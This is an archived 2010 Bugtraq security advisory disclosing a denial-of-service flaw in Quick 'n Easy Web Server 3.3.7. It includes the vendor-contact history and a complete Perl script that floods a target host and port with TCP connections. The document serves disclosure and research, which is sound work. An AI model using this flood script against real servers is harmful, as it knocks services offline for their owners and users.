lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Mon, 2 Aug 2010 12:09:14 -0700 From: Rodrigo Escobar <ipax@...abs.com.br> To: bugtraq@...urityfocus.com Subject: [DCA-0008] Quick 'n Easy WEB Server DoS [DCA-0008] [Software] - Quick 'n Easy WEB Server [Vendor Product Description] - Do you want run your own personal webserver or just want to test your ASP/PHP scripts before you upload them to your webhosting server? No problem, Quick ’n Easy Web Server can handle it! Quick ‘n Easy Web Server for Windows 98/NT/XP/2003 and Vista(32 bits) is very easy to configure, it supports native ASP (no need to install IIS!) and it looks pretty cool too! [Bug Description] - Quick 'n Easy Web Server can't handle multiple/simultaneous connections leading to Denial-of-Service [History] - Advisory sent to vendor on 06/14/2010. - No response from vendor - Public advisory & exploit 08/02/2010. [Impact] - Low [Affected Version] - Quick 'n Easy WEB Server v3.3.7 - Prior versions may also be vulnerable [Code] #!/usr/bin/perl use IO::Socket; if (@ARGV < 1) { usage(); } $ip = $ARGV[0]; $port = $ARGV[1]; $conn = $ARGV[2]; $num = 0; print "[+] Sending request...\n"; while ( $num <= $conn ) { system("echo -n ."); $s = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port") || die "[-] Connection FAILED!\n"; close($s); $num++; } print "\n[+] Done!\n"; sub usage() { print "[-] Usage: <". $0 ."> <host> <port> <num-conn>\n"; print "[-] Example: ". $0 ." 127.0.0.1 80 1200\n"; exit; } [Credits] Rodrigo Escobar (ipax) Pentester/Researcher Security Team @ DcLabs http://www.dclabs.com.br [Greetz] Crash and all Dclabs members. -- Rodrigo Escobar (ipax) Pentester/Researcher Security Team @ DcLabs http://www.dclabs.com.br
Powered by blists - more mailing lists